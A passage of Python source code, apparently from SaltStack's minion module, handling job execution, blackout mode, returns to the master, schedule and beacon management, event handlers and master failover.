whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
if function_name in minion_instance.functions:
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
else:
# only run if function_name is not in minion_instance.functions and allow_missing_funcs is True
func = function_name
args, kwargs = data['arg'], data
minion_instance.functions.pack['__context__']['retcode'] = 0
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo':
executors[-1] = 'sudo' # replace the last one with sudo
log.trace('Executors list %s', executors) # pylint: disable=no-member
for name in executors:
fname = '{0}.execute'.format(name)
if fname not in minion_instance.executors:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return_data = minion_instance.executors[fname](opts, data, func, args, kwargs)
if return_data is not None:
break
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], six.text_type(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
salt.defaults.exitcodes.EX_OK
)
if retcode == salt.defaults.exitcodes.EX_OK:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(return_data.get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = salt.defaults.exitcodes.EX_GENERIC
ret['retcode'] = retcode
ret['success'] = retcode == salt.defaults.exitcodes.EX_OK
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except CommandExecutionError as exc:
log.error(
'A command in \'%s\' had a problem: %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except SaltInvocationError as exc:
log.error(
'Problem executing \'%s\': %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(
function_name, exc, func.__doc__ or ''
)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=True)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
else:
docs = minion_instance.functions['sys.doc']('{0}*'.format(function_name))
if docs:
docs[function_name] = minion_instance.functions.missing_fun_string(function_name)
ret['return'] = docs
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# Add default returners from minion config
# Should have been coverted to comma-delimited string already
if isinstance(opts.get('return'), six.string_types):
if data['ret']:
data['ret'] = ','.join((data['ret'], opts['return']))
else:
data['ret'] = opts['return']
log.debug('minion return: %s', ret)
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
returner_str = '{0}.returner'.format(returner)
if returner_str in minion_instance.returners:
minion_instance.returners[returner_str](ret)
else:
returner_err = minion_instance.returners.missing_fun_string(returner_str)
log.error(
'Returner %s could not be loaded: %s',
returner_str, returner_err
)
except Exception as exc:
log.exception(
'The return failed for job %s: %s', data['jid'], exc
)
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID %s', sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
multifunc_ordered = opts.get('multifunc_ordered', False)
num_funcs = len(data['fun'])
if multifunc_ordered:
ret = {
'return': [None] * num_funcs,
'retcode': [None] * num_funcs,
'success': [False] * num_funcs
}
else:
ret = {
'return': {},
'retcode': {},
'success': {}
}
for ind in range(0, num_funcs):
if not multifunc_ordered:
ret['success'][data['fun'][ind]] = False
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
elif minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
key = ind if multifunc_ordered else data['fun'][ind]
ret['return'][key] = func(*args, **kwargs)
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
if retcode == 0:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(ret['return'][key].get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = 1
ret['retcode'][key] = retcode
ret['success'][key] = retcode == 0
except Exception as exc:
trb = traceback.format_exc()
log.warning('The minion function caused an exception: %s', exc)
if multifunc_ordered:
ret['return'][ind] = trb
else:
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job %s: %s',
data['jid'], exc
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
log.trace('Return data: %s', ret)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['uid'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
if ret['jid'] == 'req':
ret['jid'] = salt.utils.jid.gen_jid(self.opts)
salt.utils.minion.cache_jobs(self.opts, ret['jid'], ret)
if not self.opts['pub_ret']:
return ''
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _return_pub_multi(self, rets, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
if not isinstance(rets, list):
rets = [rets]
jids = {}
for ret in rets:
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
load = jids.setdefault(jid, {})
if ret_cmd == '_syndic_return':
if not load:
load.update({'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__'),
'return': {}})
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load.update({'id': self.opts['id']})
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
load = {'cmd': ret_cmd,
'load': list(six.itervalues(jids))}
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning(
'Cannot run startup_states when \'master_type\' is set '
'to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.'
)
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# Old style event. Defaults to False in Sodium release.
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# send name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify=%s', notify)
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def beacons_refresh(self):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing beacons.')
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
def matchers_refresh(self):
'''
Refresh the matchers
'''
log.debug('Refreshing matchers.')
self.matchers = salt.loader.matchers(self.opts)
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
if self.connected:
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
funcs = {'delete': ('delete_job', (name, persist)),
'add': ('add_job', (schedule, persist)),
'modify': ('modify_job',
(name, schedule, persist)),
'enable': ('enable_schedule', ()),
'disable': ('disable_schedule', ()),
'enable_job': ('enable_job', (name, persist)),
'disable_job': ('disable_job', (name, persist)),
'postpone_job': ('postpone_job', (name, data)),
'skip_job': ('skip_job', (name, data)),
'reload': ('reload', (schedule)),
'list': ('list', (where)),
'save_schedule': ('save_schedule', ()),
'get_next_fire_time': ('get_next_fire_time',
(name))}
# Call the appropriate schedule function
try:
alias, params = funcs.get(func)
getattr(self.schedule, alias)(*params)
except TypeError:
log.error('Function "%s" is unavailable in salt.utils.scheduler',
func)
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
include_pillar = data.get('include_pillar', None)
include_opts = data.get('include_opts', None)
funcs = {'add': ('add_beacon', (name, beacon_data)),
'modify': ('modify_beacon', (name, beacon_data)),
'delete': ('delete_beacon', (name)),
'enable': ('enable_beacons', ()),
'disable': ('disable_beacons', ()),
'enable_beacon': ('enable_beacon', (name)),
'disable_beacon': ('disable_beacon', (name)),
'list': ('list_beacons', (include_opts,
include_pillar)),
'list_available': ('list_available_beacons', ()),
'validate_beacon': ('validate_beacon', (name,
beacon_data)),
'reset': ('reset', ())}
# Call the appropriate beacon function
try:
alias, params = funcs.get(func)
getattr(self.beacons, alias)(*params)
except TypeError:
log.error('Function "%s" is unavailable in salt.utils.beacons',
func)
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This %s was scheduled to stop. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
elif self._running is True:
log.error(
'This %s is already running. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
try:
log.info(
'%s is starting as user \'%s\'',
self.__class__.__name__, salt.utils.user.get_user()
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.platform.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting %s',
self.__class__.__name__,
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
def _handle_tag_module_refresh(self, tag, data):
'''
Handle a module_refresh event
'''
self.module_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
@tornado.gen.coroutine
def _handle_tag_pillar_refresh(self, tag, data):
'''
Handle a pillar_refresh event
'''
yield self.pillar_refresh(
force_refresh=data.get('force_refresh', False)
)
def _handle_tag_beacons_refresh(self, tag, data):
'''
Handle a beacon_refresh event
'''
self.beacons_refresh()
def _handle_tag_matchers_refresh(self, tag, data):
'''
Handle a matchers_refresh event
'''
self.matchers_refresh()
def _handle_tag_manage_schedule(self, tag, data):
'''
Handle a manage_schedule event
'''
self.manage_schedule(tag, data)
def _handle_tag_manage_beacons(self, tag, data):
'''
Handle a manage_beacons event
'''
self.manage_beacons(tag, data)
def _handle_tag_grains_refresh(self, tag, data):
'''
Handle a grains_refresh event
'''
if (data.get('force_refresh', False) or
self.grains_cache != self.opts['grains']):
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
def _handle_tag_environ_setenv(self, tag, data):
'''
Handle a environ_setenv event
'''
self.environ_setenv(tag, data)
def _handle_tag_minion_mine(self, tag, data):
'''
Handle a _minion_mine event
'''
self._mine_send(tag, data)
def _handle_tag_fire_master(self, tag, data):
'''
Handle a fire_master event
'''
if self.connected:
log.debug('Forwarding master event tag=%s', data['tag'])
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
def _handle_tag_master_disconnected_failback(self, tag, data):
'''
Handle a master_disconnected_failback event
'''
# if the master disconnect event is for a different master, raise an exception
if tag.startswith(master_event(type='disconnected')) and data['master'] != self.opts['master']:
# not mine master, ignore
return
if tag.startswith(master_event(type='failback')):
# if the master failback event is not for the top master, raise an exception
if data['master'] != self.opts['master_list'][0]:
raise SaltException('Bad master \'{0}\' when mine failback is \'{1}\''.format(
data['master'], self.opts['master']))
# if the master failback event is for the current master, raise an exception
elif data['master'] == self.opts['master'][0]:
raise SaltException('Already connected to \'{0}\''.format(data['master']))
if self.connected:
# we are not connected anymore
self.connected = False
log.info('Connection to master %s lost', self.opts['master'])
# we can't use the config default here because the default '0' value is overloaded
# to mean 'if 0 disable the job', but when salt detects a timeout it also sets up
# these jobs
master_alive_interval = self.opts['master_alive_interval'] or 60
if self.opts['master_type'] != 'failover':
# modify the scheduled job to fire on reconnect
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': master_alive_interval,
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
else:
# delete the scheduled job to don't interfere with the failover process
if self.opts['transport'] != 'tcp':
self.schedule.delete_job(name=master_event(type='alive', master=self.opts['master']),
persist=True)
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'auth'):
self.pub_channel.auth.invalidate()
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
try:
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True,
failback=tag.startswith(master_event(type='failback')))
except SaltClientError:
pass
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info(
'Re-initialising subsystems for new master %s',
self.opts['master']
)
# put the current schedule into the new loaders
self.opts['schedule'] = self.schedule.option('schedule')
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# make the schedule to use the new 'functions' loader
self.schedule.functions = self.functions
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': master_alive_interval,
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
if self.opts['master_failback'] and 'master_list' in self.opts:
if self.opts['master'] != self.opts['master_list'][0]:
schedule = {
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
self.schedule.modify_job(name=master_event(type='failback'),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='failback'), persist=True)
else:
self.restart = True
self.io_loop.stop()
def _handle_tag_master_connected(self, tag, data):
'''
Handle a master_connected event
'''
# handle this event only once. otherwise it will pollute the log
# also if master type is failover all the reconnection work is done
# by `disconnected` event handler and this event must never happen,
# anyway check it to be sure
if not self.connected and self.opts['master_type'] != 'failover':
log.info('Connection to master %s re-established', self.opts['master'])
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
if self.opts['transport'] != 'tcp':
if self.opts['master_alive_interval'] > 0:
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='alive', master=self.opts['master']), persist=True)
def _handle_tag_schedule_return(self, tag, data):
'''
Handle a _schedule_return event
'''
# reporting current connection with master
if data['schedule'].startswith(master_event(type='alive', master='')):
if data['return']:
log.debug(
'Connected to master %s',
data['schedule'].split(master_event(type='alive', master=''))[1]
)
self._return_pub(data, ret_cmd='_return', sync=False)
def _handle_tag_salt_error(self, tag, data):
'''
Handle a _salt_error event
'''
if self.connected:
log.debug('Forwarding salt error event tag=%s', tag)
self._fire_master(data, tag)
def _handle_tag_salt_auth_creds(self, tag, data):
'''
Handle a salt_auth_creds event
'''
key = tuple(data['key'])
log.debug(
'Updating auth data for %s: %s -> %s',
key, salt.crypt.AsyncAuth.creds_map.get(key), data['creds']
)
salt.crypt.AsyncAuth.creds_map[tuple(data['key'])] = data['creds']
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
if not self.ready:
raise tornado.gen.Return()
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug(
'Minion of \'%s\' is handling event tag \'%s\'',
self.opts['master'], tag
)
tag_functions = {
'beacons_refresh': self._handle_tag_beacons_refresh,
'environ_setenv': self._handle_tag_environ_setenv,
'fire_master': self._handle_tag_fire_master,
'grains_refresh': self._handle_tag_grains_refresh,
'matchers_refresh': self._handle_tag_matchers_refresh,
'manage_schedule': self._handle_tag_manage_schedule,
'manage_beacons': self._handle_tag_manage_beacons,
'_minion_mine': self._handle_tag_minion_mine,
'module_refresh': self._handle_tag_module_refresh,
'pillar_refresh': self._handle_tag_pillar_refresh,
'salt/auth/creds': self._handle_tag_salt_auth_creds,
'_salt_error': self._handle_tag_salt_error,
'__schedule_return': self._handle_tag_schedule_return,
master_event(type='disconnected'): self._handle_tag_master_disconnected_failback,
master_event(type='failback'): self._handle_tag_master_disconnected_failback,
master_event(type='connected'): self._handle_tag_master_connected,
}
# Run the appropriate function
for tag_function in tag_functions:
if tag.startswith(tag_function):
tag_functions[tag_function](tag, data)
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.platform.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
def _setup_core(self):
'''
Set up the core minion attributes.
This is safe to call multiple times.
'''
if not self.ready:
# First call. Initialize.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
# self.matcher = Matcher(self.opts, self.functions)
self.matchers = salt.loader.matchers(self.opts)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.grains_cache = self.opts['grains']
self.ready = True
def setup_beacons(self, before_connect=False):
'''
Set up the beacons.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'beacons' not in self.periodic_callbacks:
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons and self.connected:
self._fire_master(events=beacons)
new_periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(
handle_beacons, loop_interval * 1000)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_beacons()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
self._fallback_cleanups, loop_interval * 1000)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
def setup_scheduler(self, before_connect=False):
'''
Set up the scheduler.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'schedule' not in self.periodic_callbacks:
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
utils=self.utils,
cleanup=[master_event(type='alive')])
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
new_periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_schedule()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
self._fallback_cleanups, loop_interval * 1000)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
log.debug('Minion \'%s\' trying to tune in', self.opts['id'])
if start:
if self.opts.get('beacons_before_connect', False):
self.setup_beacons(before_connect=True)
if self.opts.get('scheduler_before_connect', False):
self.setup_scheduler(before_connect=True)
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
if HAS_WIN_FUNCTIONS:
salt.utils.win_functions.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
self.setup_beacons()
self.setup_scheduler()
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0 and self.connected:
def ping_master():
try:
def ping_timeout_handler(*_):
if self.opts.get('auth_safemode', False):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay %ss', delay)
try:
self.functions['service.restart'](service_name())
except KeyError:
